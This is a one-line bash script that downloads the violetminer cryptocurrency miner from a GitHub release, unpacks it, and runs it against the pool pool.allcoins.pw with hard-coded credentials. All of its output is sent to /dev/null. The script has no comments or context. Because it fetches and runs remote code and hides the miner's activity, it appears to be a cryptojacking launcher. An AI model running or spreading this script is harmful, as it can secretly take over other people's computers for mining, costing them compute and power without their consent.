#!/bin/bash
wget https://github.com/turtlecoin/violetminer/releases/download/v0.2.2/violetminer-linux-v0.2.2.tar.gz && tar -zxf violetminer-linux-v0.2.2.tar.gz && cd violetminer-linux-v0.2.2 && ./violetminer --pool pool.allcoins.pw:3333 --username allcoins.pw --password 581058 --algorithm wrkzcoin >/dev/null >/dev/null 2>&1
